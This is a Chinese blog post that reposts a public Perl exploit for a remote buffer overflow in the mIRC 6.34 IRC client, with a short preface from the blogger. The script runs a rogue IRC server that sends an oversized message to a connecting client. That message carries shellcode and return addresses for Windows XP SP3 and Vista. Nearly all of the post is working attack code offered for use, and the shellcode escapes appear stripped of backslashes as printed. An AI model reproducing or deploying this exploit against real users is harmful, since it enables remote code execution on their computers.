mIRC 6.34 远程缓冲区溢出漏洞利用工具
好久没给大家提供漏洞类的东西了,这个blog都快成软件类blog了,究其原因,是因为夜火我技术太菜了,很多漏洞看不懂,看不懂的我也懒得发,以免过多的人说俺装B。
但是也不能不发吧,发出来的文章,技术深度肯定要浅些的,甚至不用太多技术。比如直接的利用工具,这篇文章就是。
mIRC 6.34 Remote Buffer Overflow Exploit
mIRC 6.34 远程缓冲区溢出漏洞利用工具
#!/usr/bin/perl
#
#
# mIRC 6.34 Remote Buffer Overflow Exploit
# Exploit by SkD (skdrat <at> hotmail <.> com)
# —————————————-
# A day’s work of debugging and looking at mIRC.
#
# Tested on Windows XP SP3 English and Windows Vista SP0.
#
# Credits to securfrog for publishing the PoC.
#
# Author has no responsibility over the damage you do with this!
#
# Note: You might change the addresses for Vista ;)
#
# —————————————-
use IO::Socket;
if(!($ARGV[1]))
{
print “
[x] mIRC 6.34 Remote Buffer Overflow Exploit
”;
print “[x] Exploit by SkD (skdrat@ hotmail.com)
”;
print “[x] Use: mirc_exp.pl <port> <OS = 1 for XP Sp3 AND 2 for Vista SP0>
[x] Example: mirc_exp.pl 6667 0
”;
exit;
}
while(1)
{
my $sock=new IO::Socket::INET (
Listen => 1,
LocalAddr => ‘127.0.0.1′,
LocalPort => $ARGV[0],
Proto => ‘tcp’);
die unless $sock;
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
“x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x1e”.
“x95x97xf1x83xebxfcxe2xf4xe2x7dxd3xf1x1ex95x1cxb4″.
“x22x1exebxf4x66x94x78x7ax51x8dx1cxaex3ex94x7cxb8″.
“x95xa1x1cxf0xf0xa4x57x68xb2x11x57x85x19x54x5dxfc”.
“x1fx57x7cx05x25xc1xb3xf5x6bx70x1cxaex3ax94x7cx97″.
“x95x99xdcx7ax41x89x96x1ax95x89x1cxf0xf5x1cxcbxd5″.
“x1ax56xa6x31x7ax1exd7xc1x9bx55xefxfdx95xd5x9bx7a”.
“x6ex89x3ax7ax76x9dx7cxf8x95x15x27xf1x1ex95x1cx99″.
“x22xcaxa6x07x7exc3x1ex09x9dx55xecxa1x76x65x1dxf5″.
“x41xfdx0fx0fx94x9bxc0x0exf9xf6xf6x9dx7dx95x97xf1″;
print “[x] Listening on port “.$ARGV[0].”..
”;
$s=$sock->accept();
print “[x] Got a user!
”;
$overflow = “x41″ x 307;
$overflow2 = “B” x 12;
$eip_vista = “x66x1cxc2x76″; #Normaliz.DLL pop pop ret
$eip2_vista = “xd3xdbx54x77″; #MSFCT.DLL jmp esp
$eip_xpsp3 = “xd1xfbx92x77″; #SETUPAPI.DLL 0×7792FBD1 pop eax pop ret
$eip2_xpsp3 = “xb7x87x9dx77″; #SETUPAPI.DLL 0×779D87B7 jmp esp
$addr = “xb5xb5xfdx7f”;
$nop_sled = “x90″ x 4;
$jmp = “xEBx03xFFxFF”;
print “[x] Sending packets.. ”;
print $s “:my_irc_server.com 001 wow :Welcome to the Internet Relay Network wow
”;
sleep(1);
if($ARGV[1] == “1″){
print $s “:”.$overflow.$eip_xpsp3.$addr.$nop_sled.$eip2_xpsp3.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled.” PRIVMSG wow : /FINGER wow.
”;
}else{
print $s “:”.$overflow.$eip_vista.$addr.$nop_sled.$eip2_vista.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled.” PRIVMSG wow : /FINGER wow.
”;
}
print “[x] Check it out!
”;
}
# milw0rm.com [2008-10-04]